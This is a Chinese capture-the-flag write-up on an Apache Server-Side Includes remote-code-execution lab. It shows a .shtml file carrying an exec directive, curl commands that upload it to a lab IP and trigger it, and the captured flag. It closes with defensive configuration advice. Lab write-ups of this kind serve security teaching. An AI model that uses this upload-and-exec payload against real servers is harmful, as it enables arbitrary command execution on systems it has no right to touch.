news 2026/4/26 16:56:02

玄机靶场-Httpd(ssi-rce) WP

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
玄机靶场-Httpd(ssi-rce) WP

玄机靶场-Httpd(ssi-rce) WP

简单级渗透题,1个步骤,考察 Apache HTTP Server 在开启 SSI(Server-Side Includes)和 CGI 支持时,通过上传.shtml文件实现任意命令执行,读取/flag文件。


1. 漏洞背景与原理

SSI(Server-Side Includes)是 Apache HTTP Server 的一项功能,允许在 HTML 文件中嵌入特殊指令,由服务器在返回响应前解析并执行这些指令。当 Apache 同时开启了 SSI 和 CGI 支持时,.shtml文件中的<!--#exec cmd="命令" -->指令会被服务器执行,并将命令输出嵌入到响应内容中。

漏洞的产生条件:

  1. Apache 配置中启用了IncludesIncludesNOEXEC选项
  2. Apache 配置中启用了ExecCGI选项
  3. 目标网站存在文件上传功能,且未限制.shtml文件的上传

当以上条件同时满足时,攻击者可以上传包含 SSI 指令的.shtml文件,然后通过访问该文件触发服务器端命令执行。


2. 信息收集

靶机 IP:69.230.246.48,端口:8081

根据题目描述,访问http://69.230.246.48:8081/upload.php可以看到文件上传表单:

<formmethod="post"enctype="multipart/form-data">File:<inputtype="file"name="file_upload"><inputtype="submit"></form>

服务器允许上传文件,且上传后文件直接可访问(无路径混淆)。


3. 漏洞利用

步骤一:构造恶意 .shtml 文件

创建包含 SSI exec 指令的文件,用于读取/flag

cat>shell.shtml<<'EOF' <!--#exec cmd="cat /flag" --> EOF

步骤二:上传 .shtml 文件

curl-sk-XPOST"http://69.230.246.48:8081/upload.php"\-F"file_upload=@shell.shtml;type=text/html"

响应中返回了上传文件的访问路径:

<ahref='/shell.shtml'>shell.shtml</a>

步骤三:访问文件触发 SSI 命令执行

curl-sk"http://69.230.246.48:8081/shell.shtml"

服务器解析 SSI 指令,执行cat /flag,将结果嵌入响应:

flag{fa288adb-ece7-4470-9e90-59010b482601}

Flag 1:flag{fa288adb-ece7-4470-9e90-59010b482601}


总结

本题完整演示了 Apache SSI RCE 的利用链:文件上传功能未限制.shtml文件 → Apache 开启了 SSI + CGI 支持 → 上传包含<!--#exec cmd="..." -->指令的.shtml文件 → 访问文件触发服务器端命令执行。

防御建议:

  • 在 Apache 配置中禁用IncludesExecCGI选项,或限制其适用目录
  • 文件上传功能应严格限制允许上传的文件类型,禁止.shtml.php.cgi等可执行文件
  • 上传目录应配置为不可执行(Options -ExecCGI -Includes

Flag 汇总:

  1. 读取 /flag:flag{fa288adb-ece7-4470-9e90-59010b482601}
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/26 16:55:28

探索Fay:构建智能数字人Agent的优雅框架

探索Fay&#xff1a;构建智能数字人Agent的优雅框架 【免费下载链接】Fay fay是一个帮助数字人&#xff08;2.5d、3d、移动、pc、网页&#xff09;或大语言模型&#xff08;openai兼容、deepseek&#xff09;连通业务系统的agent框架。 项目地址: https://gitcode.com/GitHub…

作者头像 李华
网站建设 2026/4/26 16:55:17

基于LLM智能体的学术评审仿真:AgentReview项目部署与实验指南

1. 项目概述&#xff1a;用AI智能体模拟学术同行评审 如果你在学术圈待过&#xff0c;或者参与过顶会论文的投稿&#xff0c;一定对“同行评审”这个环节又爱又恨。它决定了你数月甚至数年的心血能否被认可&#xff0c;但整个过程却像一个黑箱&#xff1a;为什么审稿人的意见有…

作者头像 李华
网站建设 2026/4/26 16:54:01

告别玄学!用这六步搞定开关电源环路补偿,实测TI TPS5430芯片案例

告别玄学&#xff01;用这六步搞定开关电源环路补偿&#xff0c;实测TI TPS5430芯片案例 环路补偿一直是电源设计中最令人头疼的"黑箱"环节。很多工程师面对波特图上那些起伏的曲线时&#xff0c;总感觉像是在解读某种神秘符号——明明知道系统不稳定&#xff0c;却不…

作者头像 李华
网站建设 2026/4/26 16:52:31

gifuct-js:现代前端开发者的GIF处理加速引擎

gifuct-js&#xff1a;现代前端开发者的GIF处理加速引擎 【免费下载链接】gifuct-js Fastest javascript .GIF decoder/parser 项目地址: https://gitcode.com/gh_mirrors/gi/gifuct-js 在当今富媒体交互时代&#xff0c;GIF动态图像已成为网页内容不可或缺的组成部分。…

作者头像 李华
网站建设 2026/4/26 16:48:21

Xbox成就解锁终极指南:免费工具实现全成就梦想

Xbox成就解锁终极指南&#xff1a;免费工具实现全成就梦想 【免费下载链接】Xbox-Achievement-Unlocker Achievement unlocker for xbox games (barely works but it does) 项目地址: https://gitcode.com/gh_mirrors/xb/Xbox-Achievement-Unlocker 还在为Xbox游戏中那些…

作者头像 李华
网站建设 2026/4/26 16:42:27

2026届毕业生推荐的六大降AI率助手实测分析

Ai论文网站排名&#xff08;开题报告、文献综述、降aigc率、降重综合对比&#xff09; TOP1. 千笔AI TOP2. aipasspaper TOP3. 清北论文 TOP4. 豆包 TOP5. kimi TOP6. deepseek 面对那些有着降低文本人工智能生成特征需求的用户而言&#xff0c;挑选适宜的处理平台是极为…

作者头像 李华